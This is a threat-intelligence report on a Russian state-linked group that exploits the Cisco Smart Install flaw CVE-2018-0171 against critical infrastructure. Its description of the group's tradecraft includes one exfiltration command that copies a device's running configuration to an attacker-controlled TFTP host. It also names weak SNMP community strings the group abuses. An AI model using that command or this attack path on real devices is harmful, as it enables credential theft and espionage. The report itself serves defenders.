Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco Smart Install Flaw Against Critical Infrastructure — Threadlinqs Intelligence
As of 2026-07-13, Static Tundra (FSB Center 16) Exploits CVE-2018-0171 Cisco Smart Install Flaw Against Critical Infrastructure is a critical-severity vulnerability threat attributed to Static Tundra (Russia), tracked by Threadlinqs Intelligence with 9 detection rules (Splunk SPL, Microsoft KQL, Sigma) and 22 indicators of compromise.
Threat ID: TL-2026-1282 · Severity: CRITICAL · CVSS: 9.8 · Status: ACTIVE · Category: VULNERABILITY
Attribution: Static Tundra · Russia · ESPIONAGE
NSA, FBI, and CISA, joined by 15 allied agencies across nine countries, issued a joint advisory on Static Tundra (aka Berserk Bear, Energetic Bear, Crouching Yeti, Dragonfly, Ghost Blizzard), a
Static Tundra is a Russian state-sponsored cyber-espionage group, assessed by Cisco Talos to be linked to the FSB's Center 16 unit and likely a sub-cluster of the longer-running Energetic Bear (Berserk Bear/Dragonfly) activity cluster, with operations tracing back over a decade to at least 2015. The group's hallmark tradecraft is network-device-centric espionage: rather than deploying conventional endpoint malware, Static Tundra targets routers and switches directly, favoring unpatched, end-of-life Cisco IOS and IOS XE devices.
The group's primary current initial-access vector is CVE-2018-0171, a critical (CVSS 9.8) unauthenticated remote code execution / denial-of-service vulnerability in the Cisco Smart Install feature. Despite being patched by Cisco in 2018, Static Tundra has aggressively and continuously exploited unpatched instances since at least November 2021, sending crafted Smart Install messages to TCP port 4786 to trigger a stack/buffer overflow that grants administrative control of the device. In parallel, the group scans for and abuses devices still configured with default or weak SNMP community strings (e.g., "public", "anonymous"), issuing SNMP commands — sometimes with spoofed source IP addresses to bypass access control lists — to read and rewrite device configuration.
Once administrative access is obtained, Static Tundra exfiltrates the full running/startup configuration via TFTP or FTP (commands such as `copy running-config tftp://<actor_ip>/config.txt` or via the CISCO-CONFIG-COPY-MIB SNMP object), harvesting Type 7 (Vigenere-cipher, trivially reversible) passwords, plaintext credentials, SNMP community strings, and TACACS+ secrets embedded in the config. The group then re-uses these harvested credentials to pivot deeper, create new privileged (privilege level 15) local accounts, enable TELNET where disabled, modify TACACS+ configuration to degrade centralized logging, adjust ACLs to permit continued actor access, and in some cases establish GRE tunnels to redirect and collect NetFlow/traffic data. For long-term persistence on more capable platforms, Talos assesses with moderate confidence that Static Tundra is associated with the historic SYNful Knock firmware implant — a modular backdoor injected directly into the Cisco IOS image that survives reboots and is remotely activated via a crafted TCP SYN "magic packet."
Victimology spans telecommunications, higher education, and manufacturing globally (North America, Asia, Africa, Europe), with a documented escalation in targeting of Ukraine and allied nations following Russia's 2022 full-scale invasion. The July 2026 joint advisory broadens the disclosed target set to energy, defense industrial base, healthcare, financial services, and state/local government sectors, reflecting continued FSB strategic-intelligence and pre-positioning objectives against Western critical infrastructure. The nine-country coalition advisory (US, Australia, UK, Canada, New Zealand, Estonia, Finland, France, Italy) underscores the scale and persistence of the campaign and urges immediate disabling of Smart Install, migration to SNMPv3, and replacement of end-of-life hardware.
Weaknesses (CWE)
CWE-787, CWE-20
Target sectors: energy, communications, telecoms, defense industrial base, health, financial services, government administration, higher education, manufacturing
Target regions: North America, Europe, Asia, Africa, ukraine
Detections & IOCs
As of 2026-07-28, this threat has 9 detection rule(s) across Splunk SPL, Microsoft KQL and Sigma, and 22 indicator(s) of compromise. Detection query text and full IOC values are available to authenticated users and programmatically via the Threadlinqs MCP server (Purple tier). View plans.
Community OSINT corroboration
1 of this threat's indicators have also been reported by the open-source security community, which observed at least one of them before this report was published. Community sightings are unverified and are kept separate from Threadlinqs' curated indicators. Indicator values, reporters and campaign linkage are available to authenticated Red-tier users.
VULNERABILITY, CRITICAL, threat intelligence, cybersecurity, CVE-2018-0171, T1595, T1590, T1190, T1133, T1078, T1059, T1136, T1098, T1601, T1584